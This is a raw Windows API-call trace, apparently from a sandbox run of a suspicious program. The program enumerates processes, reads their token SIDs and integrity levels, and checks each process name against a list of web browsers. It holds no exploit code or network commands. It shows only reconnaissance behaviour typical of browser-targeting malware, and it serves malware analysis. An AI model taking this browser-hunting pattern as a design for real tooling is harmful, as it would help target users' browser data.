[0222.739] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.739] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.739] CloseHandle (hObject=0x590) returned 1 [0222.739] CloseHandle (hObject=0x584) returned 1 [0222.739] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x584 [0222.739] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e6ef0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.739] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.739] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.739] GetLastError () returned 0x7a [0222.739] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.739] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.739] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.739] CloseHandle (hObject=0x590) returned 1 [0222.739] CloseHandle (hObject=0x584) returned 1 [0222.739] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0222.739] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0222.739] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0222.739] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0222.739] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0222.739] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0222.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x584 [0222.740] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.740] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.740] GetLastError () returned 0x7a [0222.740] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.740] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.740] CloseHandle (hObject=0x590) returned 1 [0222.740] CloseHandle (hObject=0x584) returned 1 [0222.740] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x584 [0222.740] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7028, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.740] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.740] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.740] GetLastError () returned 0x7a [0222.740] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.740] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.740] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.740] CloseHandle (hObject=0x590) returned 1 [0222.740] CloseHandle (hObject=0x584) returned 1 [0222.740] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0222.740] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0222.740] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0222.740] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0222.740] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0222.740] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0222.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x584 [0222.740] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.740] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.740] GetLastError () returned 0x7a [0222.740] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.740] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.740] CloseHandle (hObject=0x590) returned 1 [0222.740] CloseHandle (hObject=0x584) returned 1 [0222.740] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x584 [0222.740] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7138, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.740] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.740] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.740] GetLastError () returned 0x7a [0222.740] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.741] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.741] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.741] CloseHandle (hObject=0x590) returned 1 [0222.741] CloseHandle (hObject=0x584) returned 1 [0222.741] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0222.741] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0222.741] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0222.741] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0222.741] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0222.741] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0222.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x584 [0222.741] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.741] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.741] GetLastError () returned 0x7a [0222.741] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.741] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.741] CloseHandle (hObject=0x590) returned 1 [0222.741] CloseHandle (hObject=0x584) returned 1 [0222.741] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x584 [0222.741] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7270, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.741] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.741] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.741] GetLastError () returned 0x7a [0222.741] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.741] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.741] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.741] CloseHandle (hObject=0x590) returned 1 [0222.741] CloseHandle (hObject=0x584) returned 1 [0222.741] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.741] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.741] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.741] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.741] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.741] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x584 [0222.741] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.741] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.741] GetLastError () returned 0x7a [0222.741] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.742] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.742] CloseHandle (hObject=0x590) returned 1 [0222.742] CloseHandle (hObject=0x584) returned 1 [0222.742] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x584 [0222.742] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e73a0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.742] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.742] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.742] GetLastError () returned 0x7a [0222.742] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.742] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.742] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.742] CloseHandle (hObject=0x590) returned 1 [0222.742] CloseHandle (hObject=0x584) returned 1 [0222.742] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0222.742] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0222.742] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0222.742] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0222.742] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0222.742] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0222.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x584 [0222.742] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.742] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.742] GetLastError () returned 0x7a [0222.742] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.742] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.742] CloseHandle (hObject=0x590) returned 1 [0222.742] CloseHandle (hObject=0x584) returned 1 [0222.742] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x584 [0222.742] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e74e0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.742] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.742] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.742] GetLastError () returned 0x7a [0222.742] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.742] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.742] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.742] CloseHandle (hObject=0x590) returned 1 [0222.742] CloseHandle (hObject=0x584) returned 1 [0222.743] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0222.743] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0222.743] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0222.743] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0222.743] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0222.743] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0222.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x584 [0222.743] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.743] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.743] GetLastError () returned 0x7a [0222.743] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.743] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.743] CloseHandle (hObject=0x590) returned 1 [0222.743] CloseHandle (hObject=0x584) returned 1 [0222.743] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x584 [0222.743] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e75f8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.743] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.743] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.743] GetLastError () returned 0x7a [0222.743] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.743] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.743] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.743] CloseHandle (hObject=0x590) returned 1 [0222.743] CloseHandle (hObject=0x584) returned 1 [0222.743] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0222.743] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0222.743] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0222.743] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0222.743] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0222.743] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0222.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x584 [0222.743] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.743] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.743] GetLastError () returned 0x7a [0222.743] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.743] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.743] CloseHandle (hObject=0x590) returned 1 [0222.744] CloseHandle (hObject=0x584) returned 1 [0222.744] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x584 [0222.744] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7708, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.744] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.744] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 